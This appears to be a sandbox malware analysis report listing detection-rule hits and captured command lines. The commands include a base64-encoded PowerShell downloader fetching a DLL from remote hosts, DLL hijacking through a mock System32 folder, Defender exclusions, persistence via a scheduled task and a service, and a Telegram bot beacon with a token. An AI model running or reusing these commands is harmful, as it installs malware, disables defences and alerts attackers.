          Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f, CommandLine: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\System32\console_zero.exe" , ParentImage: C:\Windows\System32\console_zero.exe, ParentProcessId: 2944, ParentProcessName: console_zero.exe, ProcessCommandLine: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f, ProcessId: 4612, ProcessName: cmd.exe
          Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f, CommandLine: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\System32\console_zero.exe" , ParentImage: C:\Windows\System32\console_zero.exe, ParentProcessId: 2944, ParentProcessName: console_zero.exe, ProcessCommandLine: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f, ProcessId: 4612, ProcessName: cmd.exe
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGNvdW50ZXIgPSAwOw0KJHB5bFBhdGggPSAiQzpcVXNlcnNcUHVibGljXHB5bGQuZGxsIjsNCmZvciAoOzspew0KCWlmICgkY291bnRlciAtbGUgMyl7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHBzOi8vZ2l0aHViLmNvbS91bnZkMDEvdW52bWFpbi9yYXcvbWFpbi91bjIvYm90cHJudC5kYXQiLCAkcHlsUGF0aCk7DQoJfQ0KCWVsc2V7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHA6Ly91bnZkd2wuY29tL3VuMi9ib3Rwcm50LmRhdCIsICRweWxQYXRoKTsNCgl9DQoJU3RhcnQtU2xlZXAgLVNlY29uZHMgMjsNCglpZiAoVGVzdC1QYXRoICRweWxQYXRoKXsNCgkJY21kIC9jIG1rZGlyICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiOw0KCQljbWQgL2MgeGNvcHkgL3kgIkM6XFdpbmRvd3NcU3lzdGVtMzJccHJpbnR1aS5leGUiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMiI7DQoJCWNtZCAvYyBtb3ZlIC95ICJDOlxVc2Vyc1xQdWJsaWNccHlsZC5kbGwiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmRsbCI7DQoJCVN0YXJ0LVNsZWVwIC1TZWNvbmRzIDI7DQoJCVN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSI7DQoJCWJyZWFrOw0KCX0NCgllbHNlew0KCQlbTmV0LlNlcnZpY2VQb2ludE1hbmFnZXJdOjpTZWN1cml0eVByb3RvY29sID0gW05ldC5TZWN1cml0eVByb3RvY29sVHlwZV06OlRsczEyOw0KCQlTdGFydC1TbGVlcCAtU2Vjb25kcyAyMDsJDQoJfQ0KCWlmICgkY291bnRlciAtZXEgMTApew0KCQlicmVhazsNCgl9DQoJJGNvdW50ZXIrKzsNCn0=')); Invoke-Expression $decoded;", CommandLine: cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGNvdW50ZXIgPSAwOw0KJHB5bFBhdGggPSAiQzpcVXNlcnNcUHVibGljXHB5bGQuZGxsIjsNCmZvciAoOzspew0KCWlmICgkY291bnRlciAtbGUgMyl7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHBzOi8vZ2l0aHViLmNvbS91bnZkMDEvdW52bWFpbi9yYXcvbWFpbi91bjIvYm90cHJudC5kYXQiLCAkcHlsUGF0aCk7DQoJfQ0KCWVsc2V7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHA6Ly91bnZkd2wuY29tL3VuMi9ib3Rwcm50LmRhdCIsICRweWxQYXRoKTsNCgl9DQoJU3RhcnQtU2xlZXAgLVNlY29uZHMgMjsNCglpZiAoVGVzdC1QYXRoICRweWxQYXRoKXsNCgkJY21kIC9jIG1rZGlyICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiOw0KCQljbWQgL2MgeGNvcHkgL3kgIkM6XFdpbmRvd3NcU3lzdGVtMzJccHJpbnR1aS5leGUiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMiI7DQoJCWNtZCAvYyBtb3ZlIC95ICJDOlxVc2Vyc1xQdWJsaWNccHlsZC5kbGwiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmRsbCI7DQoJCVN0YXJ0LVNsZWVwIC1TZWNvbmRzIDI7DQoJCVN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSI7DQoJCWJyZWFrOw0KCX0NCgllbHNlew0KCQlbTmV0LlNlcnZpY2VQb2ludE1hbmFnZXJdOjpTZWN1cml0eVByb3RvY29sID0gW05ldC5TZWN1cml0eVByb3RvY29sVHlwZV06OlRsczEyOw0KCQlTdGFydC1TbGVlcCAtU2Vjb25kcyAyMDsJDQoJfQ0KCWlmICgkY291bnRlciAtZXEgMTApew0KCQlicmVhazsNCgl9DQoJJGNvdW50ZXIrKzsNCn0=')); Invoke-Expression $decoded;", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';", CommandLine: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows \System32\printui.exe" , ParentImage: C:\Windows \System32\printui.exe, ParentProcessId: 3752, ParentProcessName: printui.exe, ProcessCommandLine: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';", ProcessId: 6436, ProcessName: cmd.exe
          Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: sc create x590769 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto , CommandLine: sc create x590769 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto , CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd.exe /c sc create x590769 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x590769\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x590769.dat" /f && sc start x590769, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7132, ParentProcessName: cmd.exe, ProcessCommandLine: sc create x590769 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto , ProcessId: 5548, ProcessName: sc.exe
          Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2124, TargetFilename: C:\Users\Public\pyld.dll
          Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2124, TargetFilename: C:\Users\Public\pyld.dll
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';", CommandLine: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows \System32\printui.exe" , ParentImage: C:\Windows \System32\printui.exe, ParentProcessId: 3752, ParentProcessName: printui.exe, ProcessCommandLine: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';", ProcessId: 6436, ProcessName: cmd.exe
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\system32\cmd.exe" /c xcopy /y C:\Windows\System32\printui.exe "C:\Windows \System32", CommandLine: "C:\Windows\system32\cmd.exe" /c xcopy /y C:\Windows\System32\printui.exe "C:\Windows \System32", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGNvdW50ZXIgPSAwOw0KJHB5bFBhdGggPSAiQzpcVXNlcnNcUHVibGljXHB5bGQuZGxsIjsNCmZvciAoOzspew0KCWlmICgkY291bnRlciAtbGUgMyl7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHBzOi8vZ2l0aHViLmNvbS91bnZkMDEvdW52bWFpbi9yYXcvbWFpbi91bjIvYm90cHJudC5kYXQiLCAkcHlsUGF0aCk7DQoJfQ0KCWVsc2V7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHA6Ly91bnZkd2wuY29tL3VuMi9ib3Rwcm50LmRhdCIsICRweWxQYXRoKTsNCgl9DQoJU3RhcnQtU2xlZXAgLVNlY29uZHMgMjsNCglpZiAoVGVzdC1QYXRoICRweWxQYXRoKXsNCgkJY21kIC9jIG1rZGlyICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiOw0KCQljbWQgL2MgeGNvcHkgL3kgIkM6XFdpbmRvd3NcU3lzdGVtMzJccHJpbnR1aS5leGUiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMiI7DQoJCWNtZCAvYyBtb3ZlIC95ICJDOlxVc2Vyc1xQdWJsaWNccHlsZC5kbGwiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmRsbCI7DQoJCVN0YXJ0LVNsZWVwIC1TZWNvbmRzIDI7DQoJCVN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSI7DQoJCWJyZWFrOw0KCX0NCgllbHNlew0KCQlbTmV0LlNlcnZpY2VQb2ludE1hbmFnZXJdOjpTZWN1cml0eVByb3RvY29sID0gW05ldC5TZWN1cml0eVByb3RvY29sVHlwZV06OlRsczEyOw0KCQlTdGFydC1TbGVlcCAtU2Vjb25kcyAyMDsJDQoJfQ0KCWlmICgkY291bnRlciAtZXEgMTApew0KCQlicmVhazsNCgl9DQoJJGNvdW50ZXIrKzsNCn0=')); Invoke-Expression $decoded;", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2124, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\cmd.exe" /c xcopy /y C:\Windows\System32\printui.exe "C:\Windows \System32", ProcessId: 5780, ProcessName: cmd.exe
          Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: cmd.exe /c powershell -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot7985593430:AAEF1nr-tPqIt5EPQKoPG8e701BArtUIAv0/sendMessage' -Method Post -ContentType 'application/json' -Body (ConvertTo-Json @{chat_id='1536131459'; text='[loader] user@123716: Installed success.'});", CommandLine: cmd.exe /c powershell -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot7985593430:AAEF1nr-tPqIt5EPQKoPG8e701BArtUIAv0/sendMessage' -Method Post -ContentType 'application/json' -Body (ConvertTo-Json @{chat_id='1536131459'; text='[loader] user@123716: Installed success.'});", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows \System32\printui.exe" , ParentImage: C:\Windows \System32\printui.exe, ParentProcessId: 3752, ParentProcessName: printui.exe, ProcessCommandLine: cmd.exe /c powershell -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot7985593430:AAEF1nr-tPqIt5EPQKoPG8e701BArtUIAv0/sendMessage' -Method Post -ContentType 'application/json' -Body (ConvertTo-Json @{chat_id='1536131459'; text='[loader] user@123716: Installed success.'});", ProcessId: 6568, ProcessName: cmd.exe
          Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc create x590769 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto , CommandLine: sc create x590769 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto , CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd.exe /c sc create x590769 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x590769\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x590769.dat" /f && sc start x590769, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7132, ParentProcessName: cmd.exe, ProcessCommandLine: sc create x590769 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto , ProcessId: 5548, ProcessName: sc.exe
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGNvdW50ZXIgPSAwOw0KJHB5bFBhdGggPSAiQzpcVXNlcnNcUHVibGljXHB5bGQuZGxsIjsNCmZvciAoOzspew0KCWlmICgkY291bnRlciAtbGUgMyl7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHBzOi8vZ2l0aHViLmNvbS91bnZkMDEvdW52bWFpbi9yYXcvbWFpbi91bjIvYm90cHJudC5kYXQiLCAkcHlsUGF0aCk7DQoJfQ0KCWVsc2V7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHA6Ly91bnZkd2wuY29tL3VuMi9ib3Rwcm50LmRhdCIsICRweWxQYXRoKTsNCgl9DQoJU3RhcnQtU2xlZXAgLVNlY29uZHMgMjsNCglpZiAoVGVzdC1QYXRoICRweWxQYXRoKXsNCgkJY21kIC9jIG1rZGlyICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiOw0KCQljbWQgL2MgeGNvcHkgL3kgIkM6XFdpbmRvd3NcU3lzdGVtMzJccHJpbnR1aS5leGUiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMiI7DQoJCWNtZCAvYyBtb3ZlIC95ICJDOlxVc2Vyc1xQdWJsaWNccHlsZC5kbGwiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmRsbCI7DQoJCVN0YXJ0LVNsZWVwIC1TZWNvbmRzIDI7DQoJCVN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSI7DQoJCWJyZWFrOw0KCX0NCgllbHNlew0KCQlbTmV0LlNlcnZpY2VQb2ludE1hbmFnZXJdOjpTZWN1cml0eVByb3RvY29sID0gW05ldC5TZWN1cml0eVByb3RvY29sVHlwZV06OlRsczEyOw0KCQlTdGFydC1TbGVlcCAtU2Vjb25kcyAyMDsJDQoJfQ0KCWlmICgkY291bnRlciAtZXEgMTApew0KCQlicmVhazsNCgl9DQoJJGNvdW50ZXIrKzsNCn0=')); Invoke-Expression $decoded;", CommandLine: powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGNvdW50ZXIgPSAwOw0KJHB5bFBhdGggPSAiQzpcVXNlcnNcUHVibGljXHB5bGQuZGxsIjsNCmZvciAoOzspew0KCWlmICgkY291bnRlciAtbGUgMyl7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHBzOi8vZ2l0aHViLmNvbS91bnZkMDEvdW52bWFpbi9yYXcvbWFpbi91bjIvYm90cHJudC5kYXQiLCAkcHlsUGF0aCk7DQoJfQ0KCWVsc2V7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHA6Ly91bnZkd2wuY29tL3VuMi9ib3Rwcm50LmRhdCIsICRweWxQYXRoKTsNCgl9DQoJU3RhcnQtU2xlZXAgLVNlY29uZHMgMjsNCglpZiAoVGVzdC1QYXRoICRweWxQYXRoKXsNCgkJY21kIC9jIG1rZGlyICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiOw0KCQljbWQgL2MgeGNvcHkgL3kgIkM6XFdpbmRvd3NcU3lzdGVtMzJccHJpbnR1aS5leGUiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMiI7DQoJCWNtZCAvYyBtb3ZlIC95ICJDOlxVc2Vyc1xQdWJsaWNccHlsZC5kbGwiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmRsbCI7DQoJCVN0YXJ0LVNsZWVwIC1TZWNvbmRzIDI7DQoJCVN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSI7DQoJCWJyZWFrOw0KCX0NCgllbHNlew0KCQlbTmV0LlNlcnZpY2VQb2ludE1hbmFnZXJdOjpTZWN1cml0eVByb3RvY29sID0gW05ldC5TZWN1cml0eVByb3RvY29sVHlwZV06OlRsczEyOw0KCQlTdGFydC1TbGVlcCAtU2Vjb25kcyAyMDsJDQoJfQ0KCWlmICgkY291bnRlciAtZXEgMTApew0KCQlicmVhazsNCgl9DQoJJGNvdW50ZXIrKzsNCn0=')); Invoke-Expression $decoded;", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::Fro
          Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, CommandLine: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, ProcessId: 5276, ProcessName: svchost.exe
          No Suricata rule has matched

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: C:\Windows\System32\x590769.datReversingLabs: Detection: 54%
          Source: app64.exeReversingLabs: Detection: 26%
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Source: C:\Windows\System32\x590769.datJoe Sandbox ML: detected
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9336A60 ERR_new,ERR_set_debug,SetLastError,BIO_write,BIO_test_flags,BIO_test_flags,ERR_new,ERR_set_debug,CRYPTO_free,28_2_00007FF8A9336A60
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92E2F50 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_THREAD_run_once,CRYPTO_THREAD_run_once,CRYPTO_THREAD_run_once,28_2_00007FF8A92E2F50
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92E42D0 ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,CRYPTO_zalloc,CRYPTO_THREAD_lock_new,ERR_new,ERR_set_debug,CRYPTO_strdup,OPENSSL_LH_new,OPENSSL_LH_set_thunks,ERR_new,X509_STORE_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,OPENSSL_sk_num,ERR_new,OPENSSL_sk_new_null,ERR_new,OPENSSL_sk_new_null,ERR_new,CRYPTO_new_ex_data,ERR_new,RAND_bytes_ex,RAND_priv_bytes_ex,RAND_priv_bytes_ex,RAND_priv_bytes_ex,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_set_error,28_2_00007FF8A92E42D0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92EDAA0 CRYPTO_zalloc,CRYPTO_THREAD_lock_new,CRYPTO_new_ex_data,CRYPTO_THREAD_lock_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free_ex_data,CRYPTO_THREAD_lock_free,CRYPTO_free,OPENSSL_sk_dup,ERR_new,ERR_set_debug,ERR_set_error,X509_VERIFY_PARAM_new,ERR_new,ERR_set_debug,ERR_set_error,X509_VERIFY_PARAM_inherit,CRYPTO_memdup,CRYPTO_memdup,CRYPTO_malloc,memcpy,CRYPTO_memdup,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_set_error,28_2_00007FF8A92EDAA0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9339730 CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,CRYPTO_free,28_2_00007FF8A9339730
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92F4A20 ERR_new,ERR_set_debug,CRYPTO_THREAD_read_lock,CRYPTO_THREAD_read_lock,CRYPTO_THREAD_unlock,ERR_new,ERR_set_debug,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,memset,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,28_2_00007FF8A92F4A20
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A932AA70 CRYPTO_realloc,28_2_00007FF8A932AA70
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92E4A72 CRYPTO_memdup,CRYPTO_free,CRYPTO_free,28_2_00007FF8A92E4A72
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9304A60 ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,BN_clear_free,BN_clear_free,CRYPTO_clear_free,ERR_new,ERR_set_debug,BN_clear_free,BN_clear_free,BN_clear_free,28_2_00007FF8A9304A60
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9346A30 CRYPTO_memcmp,ERR_new,ERR_set_debug,memchr,ERR_new,CRYPTO_free,CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,28_2_00007FF8A9346A30
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92DCAB0 X509_free,EVP_PKEY_free,OSSL_STACK_OF_X509_free,CRYPTO_free,28_2_00007FF8A92DCAB0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9350AD0 CRYPTO_free,CRYPTO_free,CRYPTO_free,28_2_00007FF8A9350AD0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92E6A90 ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,OPENSSL_sk_num,OPENSSL_sk_num,OPENSSL_sk_new_reserve,ERR_new,ERR_set_debug,ERR_set_error,OPENSSL_sk_value,OSSL_PARAM_construct_int,OSSL_PARAM_construct_end,X509_VERIFY_PARAM_get_depth,X509_VERIFY_PARAM_set_depth,CRYPTO_dup_ex_data,X509_VERIFY_PARAM_inherit,OPENSSL_sk_dup,OPENSSL_sk_dup,28_2_00007FF8A92E6A90
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92D2A80 CRYPTO_free,CRYPTO_free,28_2_00007FF8A92D2A80
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92EAAD0 CRYPTO_set_ex_data,28_2_00007FF8A92EAAD0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A932A940 CRYPTO_zalloc,28_2_00007FF8A932A940
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A931E960 BIO_ADDR_family,BIO_ADDR_family,memcmp,BIO_ADDR_family,BIO_ADDR_family,memcmp,CRYPTO_malloc,BIO_ADDR_clear,BIO_ADDR_clear,28_2_00007FF8A931E960
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A931A910 CRYPTO_zalloc,OPENSSL_LH_new,OPENSSL_LH_set_thunks,OPENSSL_LH_new,OPENSSL_LH_set_thunks,OPENSSL_LH_free,OPENSSL_LH_free,CRYPTO_free,28_2_00007FF8A931A910
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92D2940 CRYPTO_zalloc,_beginthreadex,CRYPTO_free,28_2_00007FF8A92D2940
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9342930 CRYPTO_realloc,28_2_00007FF8A9342930
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A93449C0 CRYPTO_free,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,28_2_00007FF8A93449C0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92FC9A0 CRYPTO_malloc,CRYPTO_free,CRYPTO_free,28_2_00007FF8A92FC9A0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A93569E0 CRYPTO_malloc,ERR_new,ERR_set_debug,EVP_CIPHER_CTX_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,EVP_CIPHER_fetch,EVP_CIPHER_get_iv_length,RAND_bytes_ex,EVP_CIPHER_free,EVP_EncryptUpdate,EVP_EncryptFinal,ERR_new,EVP_CIPHER_free,ERR_new,CRYPTO_free,EVP_CIPHER_CTX_free,ERR_new,ERR_new,ERR_set_debug,EVP_CIPHER_CTX_get_iv_length,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,EVP_CIPHER_CTX_free,28_2_00007FF8A93569E0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92E49F0 CRYPTO_memdup,CRYPTO_free,28_2_00007FF8A92E49F0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92EE9C0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,28_2_00007FF8A92EE9C0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A931AC50 CRYPTO_zalloc,OSSL_ERR_STATE_new,CRYPTO_free,28_2_00007FF8A931AC50
